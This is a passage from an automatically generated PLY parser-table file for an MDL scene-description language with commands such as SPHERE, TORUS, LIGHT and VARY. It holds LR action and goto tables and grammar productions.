SYMBOL\n | MOVE NUMBER NUMBER NUMBERcommand : SCALE NUMBER NUMBER NUMBER SYMBOL\n | SCALE NUMBER NUMBER NUMBERcommand : ROTATE XYZ NUMBER SYMBOL\n | ROTATE XYZ NUMBERcommand : FRAMES NUMBERcommand : BASENAME TEXTcommand : VARY SYMBOL NUMBER NUMBER NUMBER NUMBER\n | VARY SYMBOL NUMBER NUMBER FXNcommand : SET SYMBOL NUMBER\n | SET_KNOBS NUMBERcommand : AMBIENT NUMBER NUMBER NUMBERcommand : CONSTANTS SYMBOL NUMBER NUMBER NUMBER NUMBER NUMBER NUMBER NUMBER NUMBER NUMBER\n | CONSTANTS SYMBOL NUMBER NUMBER NUMBER NUMBER NUMBER NUMBER NUMBER NUMBER NUMBER NUMBER NUMBER NUMBERcommand : LIGHT SYMBOL NUMBER NUMBER NUMBER NUMBER NUMBER NUMBER\n | LIGHT SYMBOL NUMBER NUMBER NUMBER NUMBER NUMBER NUMBER NUMBER NUMBER NUMBER NUMBER NUMBER NUMBER SYMBOLcommand : SHADING SHADING_TYPEcommand : CAMERA NUMBER NUMBER NUMBER NUMBER NUMBER NUMBERcommand : GENERATE_RAYFILEScommand : MESH CO TEXT\n | MESH SYMBOL CO TEXT\n | MESH CO TEXT SYMBOL\n | MESH SYMBOL CO TEXT SYMBOLcommand : SAVE_KNOBS SYMBOLcommand : SAVE_COORDS SYMBOLcommand : TWEEN NUMBER NUMBER SYMBOL SYMBOLcommand : FOCAL NUMBERcommand : WEBcommand : TEXTURE SYMBOL NUMBER NUMBER NUMBER NUMBER NUMBER NUMBER NUMBER NUMBER NUMBER NUMBER NUMBER NUMBER'
_lr_action_items = {'$end':([0,1,2,3,4,5,6,8,26,32,34,36,38,39,40,41,53,54,57,61,65,66,68,70,71,82,84,89,101,102,103,105,109,110,113,122,123,125,129,130,132,133,134,142,147,148,149,150,152,158,160,161,162,163,164,166,168,170,171,172,173,177,181,190,192,193,],[-1,0,-1,-3,-9,-10,-12,-14,-54,-63,-2,-8,-6,-7,-4,-5,-41,-42,-46,-52,-59,-60,-62,-11,-13,-40,-45,-55,-36,-38,-39,-47,-57,-56,-15,-35,-37,-44,-58,-61,-17,-16,-19,-43,-18,-20,-21,-23,-27,-53,-22,-24,-25,-28,-29,-31,-50,-26,-30,-33,-32,-34,-48,-49,-64,-51,]),'COMMENT':([0,2,3,4,5,6,8,26,32,36,38,39,40,41,53,54,57,61,65,66,68,70,71,82,84,89,101,102,103,105,109,110,113,122,123,125,129,130,132,133,134,142,147,148,149,150,152,158,160,161,162,163,164,166,168,170,171,172,173,177,181,190,192,193,],[3,3,-3,-9,-10,-12,-14,-54,-63,-8,-6,-7,-4,-5,-41,-42,-46,-52,-59,-60,-62,-11,-13,-40,-45,-55,-36,-38,-39,-47,-57,-56,-15,-35,-37,-44,-58,-61,-17,-16,-19,-43,-18,-20,-21,-23,-27,-53,-22,-24,-25,-28,-29,-31,-50,-26,-30,-33,-32,-34,-48,-49,-64,-51,]),'POP':([0,2,3,4,5,6,8,26,32,36,38,39,40,41,53,54,57,61,65,66,68,70,71,82,84,89,101,102,103,105,109,110,113,122,123,125,129,130,132,133,134,142,147,148,149,150,152,158,160,161,162,163,164,166,168,170,171,172,173,177,181,190,192,193,],[4,4,-3,-9,-10,-12,-14,-54,-63,-8,-6,-7,-4,-5,-41,-42,-46,-52,-59,-60,-62,-11,-13,-40,-45,-55,-36,-38,-39,-47,-57,-56,-15,-35,-37,-44,-58,-61,-17,-16,-19,-43,-18,-20,-21,-23,-27,-53,-22,-24,-25,-28,-29,-31,-50,-26,-30,-33,-32,-34,-48,-49,-64,-51,]),'PUSH':([0,2,3,4,5,6,8,26,32,36,38,39,40,41,53,54,57,61,65,66,68,70,71,82,84,89,101,102,103,105,109,110,113,122,123,125,129,130,132,133,134,142,147,148,149,150,152,158,160,161,162,163,164,166,168,170,171,172,173,177,181,190,192,193,],[5,5,-3,-9,-10,-12,-14,-54,-63,-8,-6,-7,-4,-5,-41,-42,-46,-52,-59,-60,-62,-11,-13,-40,-45,-55,-36,-38,-39,-47,-57,-56,-15,-35,-37,-44,-58,-61,-17,-16,-19,-43,-18,-20,-21,-23,-27,-53,-22,-24,-25,-28,-29,-31,-50,-26,-30,-33,-32,-34,-48,-49,-64,-51,]),'SCREEN':([0,2,3,4,5,6,8,26,32,36,38,39,40,41,53,54,57,61,65,66,68,70,71,82,84,89,101,102,103,105,109,110,113,122,123,125,129,130,132,133,134,142,147,148,149,150,152,158,160,161,162,163,164,166,168,170,171,172,173,177,181,190,192,193,],[6,6,-3,-9,-10,-12,-14,-54,-63,-8,-6,-7,-4,-5,-41,-42,-46,-52,-59,-60,-62,-11,-13,-40,-45,-55,-36,-38,-39,-47,-57,-56,-15,-35,-37,-44,-58,-61,-17,-16,-19,-43,-18,-20,-21,-23,-27,-53,-22,-24,-25,-28,-29,-31,-50,-26,-30,-33,-32,-34,-48,-49,-64,-51,]),'SAVE':([0,2,3,4,5,6,8,26,32,36,38,39,40,41,53,54,57,61,65,66,68,70,71,82,84,89,101,102,103,105,109,110,113,122,123,125,129,130,132,133,134,142,147,148,149,150,152,158,160,161,162,163,164,166,168,170,171,172,173,177,181,190,192,193,],[7,7,-3,-9,-10,-12,-14,-54,-63,-8,-6,-7,-4,-5,-41,-42,-46,-52,-59,-60,-62,-11,-13,-40,-45,-55,-36,-38,-39,-47,-57,-56,-15,-35,-37,-44,-58,-61,-17,-16,-19,-43,-18,-20,-21,-23,-27,-53,-22,-24,-25,-28,-29,-31,-50,-26,-30,-33,-32,-34,-48,-49,-64,-51,]),'DISPLAY':([0,2,3,4,5,6,8,26,32,36,38,39,40,41,53,54,57,61,65,66,68,70,71,82,84,89,101,102,103,105,109,110,113,122,123,125,129,130,132,133,134,142,147,148,149,150,152,158,160,161,162,163,164,166,168,170,171,172,173,177,181,190,192,193,],[8,8,-3,-9,-10,-12,-14,-54,-63,-8,-6,-7,-4,-5,-41,-42,-46,-52,-59,-60,-62,-11,-13,-40,-45,-55,-36,-38,-39,-47,-57,-56,-15,-35,-37,-44,-58,-61,-17,-16,-19,-43,-18,-20,-21,-23,-27,-53,-22,-24,-25,-28,-29,-31,-50,-26,-30,-33,-32,-34,-48,-49,-64,-51,]),'SPHERE':([0,2,3,4,5,6,8,26,32,36,38,39,40,41,53,54,57,61,65,66,68,70,71,82,84,89,101,102,103,105,109,110,113,122,123,125,129,130,132,133,134,142,147,148,149,150,152,158,160,161,162,163,164,166,168,170,171,172,173,177,181,190,192,193,],[9,9,-3,-9,-10,-12,-14,-54,-63,-8,-6,-7,-4,-5,-41,-42,-46,-52,-59,-60,-62,-11,-13,-40,-45,-55,-36,-38,-39,-47,-57,-56,-15,-35,-37,-44,-58,-61,-17,-16,-19,-43,-18,-20,-21,-23,-27,-53,-22,-24,-25,-28,-29,-31,-50,-26,-30,-33,-32,-34,-48,-49,-64,-51,]),'TORUS':([0,2,3,4,5,6,8,26,32,36,38,39,40,41,53,54,57,61,65,66,68,70,71,82,84,89,101,102,103,105,109,110,113,122,123,125,129,130,132,133,134,142,147,148,149,150,152,158,160,161,162,163,164,166,168,170,171,172,173,177,181,190,192,193,],[10,10,-3,-9,-10,-12,-14,-54,-63,-8,-6,-7,-4,-5,-41,-42,-46,-52,-59,-60,-62,-11,-13,-40,-45,-55,-36,-38,-39,-47,-57,-56,-15,-35,-37,-44,-58,-61,-17,-16,-19,-43,-18,-20,-21,-23,-27,-53,-22,-24,-25,-28,-29,-31,-50,-26,-30,-33,-32,-34,-48,-49,-64,-51,]),'BOX':([0,2,3,4,5,6,8,26,32,36,38,39,40,41,53,54,57,61,65,66,68,70,71,82,84,89,101,102,103,105,109,110,113,122,123,125,129,130,132,133,134,142,147,148,149,150,152,158,160,161,162,163,164,166,168,170,171,172,173,177,181,190,192,193,],[11,11,-3,-9,-10,-12,-14,-54,-63,-8,-6,-7,-4,-5,-41,-42,-46,-52,-59,-60,-62,-11,-13,-40,-45,-55,-36,-38,-39,-47,-57,-56,-15,-35,-37,-44,-58,-61,-17,-16,-19,-43,-18,-20,-21,-23,-27,-53,-22,-24,-25,-28,-29,-31,-50,-26,-30,-33,-32,-34,-48,-49,-64,-51,]),'LINE':([0,2,3,4,5,6,8,26,32,36,38,39,40,41,53,54,57,61,65,66,68,70,71,82,84,89,101,102,103,105,109,110,113,122,123,125,129,130,132,133,134,142,147,148,149,150,152,158,160,161,162,163,164,166,168,170,171,172,173,177,181,190,192,193,],[12,12,-3,-9,-10,-12,-14,-54,-63,-8,-6,-7,-4,-5,-41,-42,-46,-52,-59,-60,-62,-11,-13,-40,-45,-55,-36,-38,-39,-47,-57,-56,-15,-35,-37,-44,-58,-61,-17,-16,-19,-43,-18,-20,-21,-23,-27,-53,-22,-24,-25,-28,-29,-31,-50,-26,-30,-33,-32,-34,-48,-49,-64,-51,]),'MOVE':([0,2,3,4,5,6,8,26,32,36,38,39,40,41,53,54,57,61,65,66,68,70,71,82,84,89,101,102,103,105,109,110,113,122,123,125,129,130,132,133,134,142,147,148,149,150,152,158,160,161,162,163,164,166,168,170,171,172,173,177,181,190,192,193,],[13,13,-3,-9,-10,-12,-14,-54,-63,-8,-6,-7,-4,-5,-41,-42,-46,-52,-59,-60,-62,-11,-13,-40,-45,-55,-36,-38,-39,-47,-57,-56,-15,-35,-37,-44,-58,-61,-17,-16,-19,-43,-18,-20,-21,-23,-27,-53,-22,-24,-25,-28,-29,-31,-50,-26,-30,-33,-32,-34,-48,-49,-64,-51,]),'SCALE':([0,2,3,4,5,6,8,26,32,36,38,39,40,41,53,54,57,61,65,66,68,70,71,82,84,89,101,102,103,105,109,110,113,122,123,125,129,130,132,133,134,142,147,148,149,150,152,158,160,161,162,163,164,166,168,170,171,172,173,177,181,190,192,193,],[14,14,-3,-9,-10,-12,-14,-54,-63,-8,-6,-7,-4,-5,-41,-42,-46,-52,-59,-60,-62,-11,-13,-40,-45,-55,-36,-38,-39,-47,-57,-56,-15,-35,-37,-44,-58,-61,-17,-16,-19,-43,-18,-20,-21,-23,-27,-53,-22,-24,-25,-28,-29,-31,-50,-26,-30,-33,-32,-34,-48,-49,-64,-51,]),'ROTATE':([0,2,3,4,5,6,8,26,32,36,38,39,40,41,53,54,57,61,65,66,68,70,71,82,84,89,101,102,103,105,109,110,113,122,123,125,129,130,132,133,134,142,147,148,149,150,152,158,160,161,162,163,164,166,168,170,171,172,173,177,181,190,192,193,],[15,15,-3,-9,-10,-12,-14,-54,-63,-8,-6,-7,-4,-5,-41,-42,-46,-52,-59,-60,-62,-11,-13,-40,-45,-55,-36,-38,-39,-47,-57,-56,-15,-35,-37,-44,-58,-61,-17,-16,-19,-43,-18,-20,-21,-23,-27,-53,-22,-24,-25,-28,-29,-31,-50,-26,-30,-33,-32,-34,-48,-49,-64,-51,]),'FRAMES':([0,2,3,4,5,6,8,26,32,36,38,39,40,41,53,54,57,61,65,66,68,70,71,82,84,89,101,102,103,105,109,110,113,122,123,125,129,130,132,133,134,142,147,148,149,150,152,158,160,161,162,163,164,166,168,170,171,172,173,177,181,190,192,193,],[16,16,-3,-9,-10,-12,-14,-54,-63,-8,-6,-7,-4,-5,-41,-42,-46,-52,-59,-60,-62,-11,-13,-40,-45,-55,-36,-38,-39,-47,-57,-56,-15,-35,-37,-44,-58,-61,-17,-16,-19,-43,-18,-20,-21,-23,-27,-53,-22,-24,-25,-28,-29,-31,-50,-26,-30,-33,-32,-34,-48,-49,-64,-51,]),'BASENAME':([0,2,3,4,5,6,8,26,32,36,38,39,40,41,53,54,57,61,65,66,68,70,71,82,84,89,101,102,103,105,109,110,113,122,123,125,129,130,132,133,134,142,147,148,149,150,152,158,160,161,162,163,164,166,168,170,171,172,173,177,181,190,192,193,],[17,17,-3,-9,-10,-12,-14,-54,-63,-8,-6,-7,-4,-5,-41,-42,-46,-52,-59,-60,-62,-11,-13,-40,-45,-55,-36,-38,-39,-47,-57,-56,-15,-35,-37,-44,-58,-61,-17,-16,-19,-43,-18,-20,-21,-23,-27,-53,-22,-24,-25,-28,-29,-31,-50,-26,-30,-33,-32,-34,-48,-49,-64,-51,]),'VARY':([0,2,3,4,5,6,8,26,32,36,38,39,40,41,53,54,57,61,65,66,68,70,71,82,84,89,101,102,103,105,109,110,113,122,123,125,129,130,132,133,134,142,147,148,149,150,152,158,160,161,162,163,164,166,168,170,171,172,173,177,181,190,192,193,],[18,18,-3,-9,-10,-12,-14,-54,-63,-8,-6,-7,-4,-5,-41,-42,-46,-52,-59,-60,-62,-11,-13,-40,-45,-55,-36,-38,-39,-47,-57,-56,-15,-35,-37,-44,-58,-61,-17,-16,-19,-43,-18,-20,-21,-23,-27,-53,-22,-24,-25,-28,-29,-31,-50,-26,-30,-33,-32,-34,-48,-49,-64,-51,]),'SET':([0,2,3,4,5,6,8,26,32,36,38,39,40,41,53,54,57,61,65,66,68,70,71,82,84,89,101,102,103,105,109,110,113,122,123,125,129,130,132,133,134,142,147,148,149,150,152,158,160,161,162,163,164,166,168,170,171,172,173,177,181,190,192,193,],[19,19,-3,-9,-10,-12,-14,-54,-63,-8,-6,-7,-4,-5,-41,-42,-46,-52,-59,-60,-62,-11,-13,-40,-45,-55,-36,-38,-39,-47,-57,-56,-15,-35,-37,-44,-58,-61,-17,-16,-19,-43,-18,-20,-21,-23,-27,-53,-22,-24,-25,-28,-29,-31,-50,-26,-30,-33,-32,-34,-48,-49,-64,-51,]),'SET_KNOBS':([0,2,3,4,5,6,8,26,32,36,38,39,40,41,53,54,57,61,65,66,68,70,71,82,84,89,101,102,103,105,109,110,113,122,123,125,129,130,132,133,134,142,147,148,149,150,152,158,160,161,162,163,164,166,168,170,171,172,173,177,181,190,192,193,],[20,20,-3,-9,-10,-12,-14,-54,-63,-8,-6,-7,-4,-5,-41,-42,-46,-52,-59,-60,-62,-11,-13,-40,-45,-55,-36,-38,-39,-47,-57,-56,-15,-35,-37,-44,-58,-61,-17,-16,-19,-43,-18,-20,-21,-23,-27,-53,-22,-24,-25,-28,-29,-31,-50,-26,-30,-33,-32,-34,-48,-49,-64,-51,]),'AMBIENT':([0,2,3,4,5,6,8,26,32,36,38,39,40,41,53,54,57,61,65,66,68,70,71,82,84,89,101,102,103,105,109,110,113,122,123,125,129,130,132,133,134,142,147,148,149,150,152,158,160,161,162,163,164,166,168,170,171,172,173,177,181,190,192,193,],[21,21,-3,-9,-10,-12,-14,-54,-63,-8,-6,-7,-4,-5,-41,-42,-46,-52,-59,-60,-62,-11,-13,-40,-45,-55,-36,-38,-39,-47,-57,-56,-15,-35,-37,-44,-58,-61,-17,-16,-19,-43,-18,-20,-21,-23,-27,-53,-22,-24,-25,-28,-29,-31,-50,-26,-30,-33,-32,-34,-48,-49,-64,-51,]),'CONSTANTS':([0,2,3,4,5,6,8,26,32,36,38,39,40,41,53,54,57,61,65,66,68,70,71,82,84,89,101,102,103,105,109,110,113,122,123,125,129,130,132,133,134,142,147,148,149,150,152,158,160,161,162,163,164,166,168,170,171,172,173,177,181,190,192,193,],[22,22,-3,-9,-10,-12,-14,-54,-63,-8,-6,-7,-4,-5,-41,-42,-46,-52,-59,-60,-62,-11,-13,-40,-45,-55,-36,-38,-39,-47,-57,-56,-15,-35,-37,-44,-58,-61,-17,-16,-19,-43,-18,-20,-21,-23,-27,-53,-22,-24,-25,-28,-29,-31,-50,-26,-30,-33,-32,-34,-48,-49,-64,-51,]),'LIGHT':([0,2,3,4,5,6,8,26,32,36,38,39,40,41,53,54,57,61,65,66,68,70,71,82,84,89,101,102,103,105,109,110,113,122,123,125,129,130,132,133,134,142,147,148,149,150,152,158,160,161,162,163,164,166,168,170,171,172,173,177,181,190,192,193,],[23,23,-3,-9,-10,-12,-14,-54,-63,-8,-6,-7,-4,-5,-41,-42,-46,-52,-59,-60,-62,-11,-13,-40,-45,-55,-36,-38,-39,-47,-57,-56,-15,-35,-37,-44,-58,-61,-17,-16,-19,-43,-18,-20,-21,-23,-27,-53,-22,-24,-25,-28,-29,-31,-50,-26,-30,-33,-32,-34,-48,-49,-64,-51,]),'SHADING':([0,2,3,4,5,6,8,26,32,36,38,39,40,41,53,54,57,61,65,66,68,70,71,82,84,89,101,102,103,105,109,110,113,122,123,125,129,130,132,133,134,142,147,148,149,150,152,158,160,161,162,163,164,166,168,170,171,172,173,177,181,190,192,193,],[24,24,-3,-9,-10,-12,-14,-54,-63,-8,-6,-7,-4,-5,-41,-42,-46,-52,-59,-60,-62,-11,-13,-40,-45,-55,-36,-38,-39,-47,-57,-56,-15,-35,-37,-44,-58,-61,-17,-16,-19,-43,-18,-20,-21,-23,-27,-53,-22,-24,-25,-28,-29,-31,-50,-26,-30,-33,-32,-34,-48,-49,-64,-51,]),'CAMERA':([0,2,3,4,5,6,8,26,32,36,38,39,40,41,53,54,57,61,65,66,68,70,71,82,84,89,101,102,103,105,109,110,113,122,123,125,129,130,132,133,134,142,147,148,149,150,152,158,160,161,162,163,164,166,168,170,171,172,173,177,181,190,192,193,],[25,25,-3,-9,-10,-12,-14,-54,-63,-8,-6,-7,-4,-5,-41,-42,-46,-52,-59,-60,-62,-11,-13,-40,-45,-55,-36,-38,-39,-47,-57,-56,-15,-35,-37,-44,-58,-61,-17,-16,-19,-43,-18,-20,-21,-23,-27,-53,-22,-24,-25,-28,-29,-31,-50,-26,-30,-33,-32,-34,-48,-49,-64,-51,]),'GENERATE_RAYFILES':([0,2,3,4,5,6,8,26,32,36,38,39,40,41,53,54,57,61,65,66,68,70,71,82,84,89,101,102,103,105,109,110,113,122,123,125,129,130,132,133,134,142,147,148,149,150,152,158,160,161,162,163,164,166,168,170,171,172,173,177,181,190,192,193,],[26,26,-3,-9,-10,-12,-14,-54,-63,-8,-6,-7,-4,-5,-41,-42,-46,-52,-59,-60,-62,-11,-13,-40,-45,-55,-36,-38,-39,-47,-57,-56,-15,-35,-37,-44,-58,-61,-17,-16,-19,-43,-18,-20,-21,-23,-27,-53,-22,-24,-25,-28,-29,-31,-50,-26,-30,-33,-32,-34,-48,-49,-64,-51,]),'MESH':([0,2,3,4,5,6,8,26,32,36,38,39,40,41,53,54,57,61,65,66,68,70,71,82,84,89,101,102,103,105,109,110,113,122,123,125,129,130,132,133,134,142,147,148,149,150,152,158,160,161,162,163,164,166,168,170,171,172,173,177,181,190,192,193,],[27,27,-3,-9,-10,-12,-14,-54,-63,-8,-6,-7,-4,-5,-41,-42,-46,-52,-59,-60,-62,-11,-13,-40,-45,-55,-36,-38,-39,-47,-57,-56,-15,-35,-37,-44,-58,-61,-17,-16,-19,-43,-18,-20,-21,-23,-27,-53,-22,-24,-25,-28,-29,-31,-50,-26,-30,-33,-32,-34,-48,-49,-64,-51,]),'SAVE_KNOBS':([0,2,3,4,5,6,8,26,32,36,38,39,40,41,53,54,57,61,65,66,68,70,71,82,84,89,101,102,103,105,109,110,113,122,123,125,129,130,132,133,134,142,147,148,149,150,152,158,160,161,162,163,164,166,168,170,171,172,173,177,181,190,192,193,],[28,28,-3,-9,-10,-12,-14,-54,-63,-8,-6,-7,-4,-5,-41,-42,-46,-52,-59,-60,-62,-11,-13,-40,-45,-55,-36,-38,-39,-47,-57,-56,-15,-35,-37,-44,-58,-61,-17,-16,-19,-43,-18,-20,-21,-23,-27,-53,-22,-24,-25,-28,-29,-31,-50,-26,-30,-33,-32,-34,-48,-49,-64,-51,]),'SAVE_COORDS':([0,2,3,4,5,6,8,26,32,36,38,39,40,41,53,54,57,61,65,66,68,70,71,82,84,89,101,102,103,105,109,110,113,122,123,125,129,130,132,133,134,142,147,148,149,150,152,158,160,161,162,163,164,166,168,170,171,172,173,177,181,190,192,193,],[29,29,-3,-9,-10,-12,-14,-54,-63,-8,-6,-7,-4,-5,-41,-42,-46,-52,-59,-60,-62,-11,-13,-40,-45,-55,-36,-38,-39,-47,-57,-56,-15,-35,-37,-44,-58,-61,-17,-16,-19,-43,-18,-20,-21,-23,-27,-53,-22,-24,-25,-28,-29,-31,-50,-26,-30,-33,-32,-34,-48,-49,-64,-51,]),'TWEEN':([0,2,3,4,5,6,8,26,32,36,38,39,40,41,53,54,57,61,65,66,68,70,71,82,84,89,101,102,103,105,109,110,113,122,123,125,129,130,132,133,134,142,147,148,149,150,152,158,160,161,162,163,164,166,168,170,171,172,173,177,181,190,192,193,],[30,30,-3,-9,-10,-12,-14,-54,-63,-8,-6,-7,-4,-5,-41,-42,-46,-52,-59,-60,-62,-11,-13,-40,-45,-55,-36,-38,-39,-47,-57,-56,-15,-35,-37,-44,-58,-61,-17,-16,-19,-43,-18,-20,-21,-23,-27,-53,-22,-24,-25,-28,-29,-31,-50,-26,-30,-33,-32,-34,-48,-49,-64,-51,]),'FOCAL':([0,2,3,4,5,6,8,26,32,36,38,39,40,41,53,54,57,61,65,66,68,70,71,82,84,89,101,102,103,105,109,110,113,122,123,125,129,130,132,133,134,142,147,148,149,150,152,158,160,161,162,163,164,166,168,170,171,172,173,177,181,190,192,193,],[31,31,-3,-9,-10,-12,-14,-54,-63,-8,-6,-7,-4,-5,-41,-42,-46,-52,-59,-60,-62,-11,-13,-40,-45,-55,-36,-38,-39,-47,-57,-56,-15,-35,-37,-44,-58,-61,-17,-16,-19,-43,-18,-20,-21,-23,-27,-53,-22,-24,-25,-28,-29,-31,-50,-26,-30,-33,-32,-34,-48,-49,-64,-51,]),'WEB':([0,2,3,4,5,6,8,26,32,36,38,39,40,41,53,54,57,61,65,66,68,70,71,82,84,89,101,102,103,105,109,110,113,122,123,125,129,130,132,133,134,142,147,148,149,150,152,158,160,161,162,163,164,166,168,170,171,172,173,177,181,190,192,193,],[32,32,-3,-9,-10,-12,-14,-54,-63,-8,-6,-7,-4,-5,-41,-42,-46,-52,-59,-60,-62,-11,-13,-40,-45,-55,-36,-38,-39,-47,-57,-56,-15,-35,-37,-44,-58,-61,-17,-16,-19,-43,-18,-20,-21,-23,-27,-53,-22,-24,-25,-28,-29,-31,-50,-26,-30,-33,-32,-34,-48,-49,-64,-51,]),'TEXTURE':([0,2,3,4,5,6,8,26,32,36,38,39,40,41,53,54,57,61,65,66,68,70,71,82,84,89,101,102,103,105,109,110,113,122,123,125,129,130,132,133,134,142,147,148,149,150,152,158,160,161,162,163,164,166,168,170,171,172,173,177,181,190,192,193,],[33,33,-3,-9,-10,-12,-14,-54,-63,-8,-6,-7,-4,-5,-41,-42,-46,-52,-59,-60,-62,-11,-13,-40,-45,-55,-36,-38,-39,-47,-57,-56,-15,-35,-37,-44,-58,-61,-17,-16,-19,-43,-18,-20,-21,-23,-27,-53,-22,-24,-25,-28,-29,-31,-50,-26,-30,-33,-32,-34,-48,-49,-64,-51,]),'DOUBLE':([6,9,10,11,12,13,14,16,20,21,25,30,31,35,36,40,41,42,43,44,45,46,47,48,49,50,51,52,55,56,58,59,60,62,67,69,72,73,74,75,76,77,78,79,80,81,83,85,86,87,88,92,93,94,95,96,97,98,99,100,104,106,107,108,112,114,115,116,117,118,119,120,121,124,126,127,128,131,135,136,137,138,139,140,141,143,144,145,146,151,153,154,155,156,157,159,165,167,168,169,174,175,176,178,179,180,181,182,183,184,185,186,187,188,189,],[36,36,36,36,36,36,36,36,36,36,36,36,36,36,-8,-4,-5,36,36,36,36,36,36,36,36,36,36,36,36,36,36,36,36,36,36,36,36,36,36,36,36,36,36,36,36,36,36,36,36,36,36,36,36,36,36,36,36,36,36,36,36,36,36,36,36,36,36,36,36,36,36,36,36,36,36,36,36,36,36,36,36,36,36,36,36,36,36,36,36,36,36,36,36,36,36,36,36,36,36,36,36,36,36,36,36,36,36,36,36,36,36,36,36,36,36,]),'STRING':([7,17,37,38,39,40,41,63,90,],[39,39,39,-6,-7,-4,-5,39,39,]),'XYZ':([7,9,10,11,12,15,17,18,19,22,23,27,28,29,33,36,37,38,39,40,41,63,82,89,90,91,99,101,102,110,111,113,121,133,134,149,150,152,162,164,166,172,191,],[40,40,40,40,40,52,40,40,40,40,40,40,40,40,40,-8,40,-6,-7,-4,-5,40,40,40,40,40,40,40,40,40,40,40,40,40,40,40,40,40,40,40,40,40,40,]),'ID':([7,9,10,11,12,17,18,19,22,23,27,28,29,33,36,37,38,39,40,41,63,82,89,90,91,99,101,102,110,111,113,121,133,134,149,150,152,162,164,166,172,191,],[41,41,41,41,41,41,41,41,41,41,41,41,41,41,-8,41,-6,-7,-4,-5,41,41,41,41,41,41,41,41,41,41,41,41,41,41,41,41,41,41,41,41,41,41,]),'SHADING_TYPE':([24,],[61,]),'CO':([27,40,41,64,],[63,-4,-5,90,]),'FXN':([36,104,],[-8,125,]),}
_lr_action = {}
for _k, _v in _lr_action_items.items():
for _x,_y in zip(_v[0],_v[1]):
if not _x in _lr_action: _lr_action[_x] = {}
_lr_action[_x][_k] = _y
del _lr_action_items
_lr_goto_items = {'input':([0,2,],[1,34,]),'command':([0,2,],[2,2,]),'NUMBER':([6,9,10,11,12,13,14,16,20,21,25,30,31,35,42,43,44,45,46,47,48,49,50,51,52,55,56,58,59,60,62,67,69,72,73,74,75,76,77,78,79,80,81,83,85,86,87,88,92,93,94,95,96,97,98,99,100,104,106,107,108,112,114,115,116,117,118,119,120,121,124,126,127,128,131,135,136,137,138,139,140,141,143,144,145,146,151,153,154,155,156,157,159,165,167,168,169,174,175,176,178,179,180,181,182,183,184,185,186,187,188,189,],[35,42,44,46,48,50,51,53,57,58,62,67,68,70,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,91,92,93,94,95,96,97,98,99,100,101,102,104,105,106,107,108,112,113,114,115,116,117,118,119,121,124,126,127,128,131,133,134,135,136,137,138,139,141,142,143,144,145,146,149,150,151,152,153,154,155,156,157,158,159,162,164,165,166,167,168,169,172,174,175,176,178,179,180,181,182,183,184,185,186,187,188,189,190,191,192,]),'TEXT':([7,17,37,63,90,],[37,54,71,89,110,]),'SYMBOL':([7,9,10,11,12,17,18,19,22,23,27,28,29,33,37,63,82,89,90,91,99,101,102,110,111,113,121,133,134,149,150,152,162,164,166,172,191,],[38,43,45,47,49,38,55,56,59,60,64,65,66,69,38,38,103,109,38,111,120,122,123,129,130,132,140,147,148,160,161,163,170,171,173,177,193,]),}
_lr_goto = {}
for _k, _v in _lr_goto_items.items():
for _x, _y in zip(_v[0], _v[1]):
if not _x in _lr_goto: _lr_goto[_x] = {}
_lr_goto[_x][_k] = _y
del _lr_goto_items
_lr_productions = [
("S' -> input","S'",1,None,None,None),
('input -> <empty>','input',0,'p_input','mdl.py',127),
('input -> command input','input',2,'p_input','mdl.py',128),
('command -> COMMENT','command',1,'p_command_comment','mdl.py',132),
('SYMBOL -> XYZ','SYMBOL',1,'p_SYMBOL','mdl.py',136),
('SYMBOL -> ID','SYMBOL',1,'p_SYMBOL','mdl.py',137),
('TEXT -> SYMBOL','TEXT',1,'p_TEXT','mdl.py',141),
('TEXT -> STRING','TEXT',1,'p_TEXT','mdl.py',142),
('NUMBER -> DOUBLE','NUMBER',1,'p_NUMBER','mdl.py',146),
('command -> POP','command',1,'p_command_stack','mdl.py',150),
('command -> PUSH','command',1,'p_command_stack','mdl.py',151),
('command -> SCREEN NUMBER NUMBER','command',3,'p_command_screen','mdl.py',155),
('command -> SCREEN','command',1,'p_command_screen','mdl.py',156),
('command -> SAVE TEXT TEXT','command',3,'p_command_save','mdl.py',163),
('command -> DISPLAY','command',1,'p_command_show','mdl.py',167),
('command -> SPHERE NUMBER NUMBER NUMBER NUMBER','command',5,'p_command_sphere','mdl.py',171),
('command -> SPHERE SYMBOL NUMBER NUMBER NUMBER NUMBER','command',6,'p_command_sphere','mdl.py',172),
('command -> SPHERE NUMBER NUMBER NUMBER NUMBER SYMBOL','command',6,'p_command_sphere','mdl.py',173),
('command -> SPHERE SYMBOL NUMBER NUMBER NUMBER NUMBER SYMBOL','command',7,'p_command_sphere','mdl.py',174),
('command -> TORUS NUMBER NUMBER NUMBER NUMBER NUMBER','command',6,'p_command_torus','mdl.py',188),
('command -> TORUS NUMBER NUMBER NUMBER NUMBER NUMBER SYMBOL','command',7,'p_command_torus','mdl.py',189),
('command -> TORUS SYMBOL NUMBER NUMBER NUMBER NUMBER NUMBER','command',7,'p_command_torus','mdl.py',190),
('command -> TORUS SYMBOL NUMBER NUMBER NUMBER NUMBER NUMBER SYMBOL','command',8,'p_command_torus','mdl.py',191),
('command -> BOX NUMBER NUMBER NUMBER NUMBER NUMBER NUMBER','command',7,'p_command_box','mdl.py',205),
('command -> BOX NUMBER NUMBER NUMBER NUMBER NUMBER NUMBER SYMBOL','command',8,'p_command_box','mdl.py',206),
('command -> BOX SYMBOL NUMBER NUMBER NUMBER NUMBER NUMBER NUMBER','command',8,'p_command_box','mdl.py',207),
('command -> BOX SYMBOL NUMBER NUMBER NUMBER NUMBER NUMBER NUMBER SYMBOL','command',9,'p_command_box','mdl.py',208),
('command -> LINE NUMBER NUMBER NUMBER NUMBER NUMBER NUMBER','command',7,'p_command_line','mdl.py',222),
('command -> LINE NUMBER NUMBER NUMBER NUMBER NUMBER NUMBER SYMBOL','command',8,'p_command_line','mdl.py',223),
('command -> LINE NUMBER NUMBER NUMBER SYMBOL NUMBER NUMBER NUMBER','command',8,'p_command_line','mdl.py',224),
('command -> LINE NUMBER NUMBER NUMBER SYMBOL NUMBER NUMBER NUMBER SYMBOL','command',9,'p_command_line','mdl.py',225),
('command -> LINE SYMBOL NUMBER NUMBER NUMBER NUMBER NUMBER NUMBER','command',8,'p_command_line','mdl.py',226),
('command -> LINE SYMBOL NUMBER NUMBER NUMBER NUMBER NUMBER NUMBER SYMBOL','command',9,'p_command_line','mdl.py',227),
('command -> LINE SYMBOL NUMBER NUMBER NUMBER SYMBOL NUMBER NUMBER NUMBER','command',9,'p_command_line','mdl.py',228),
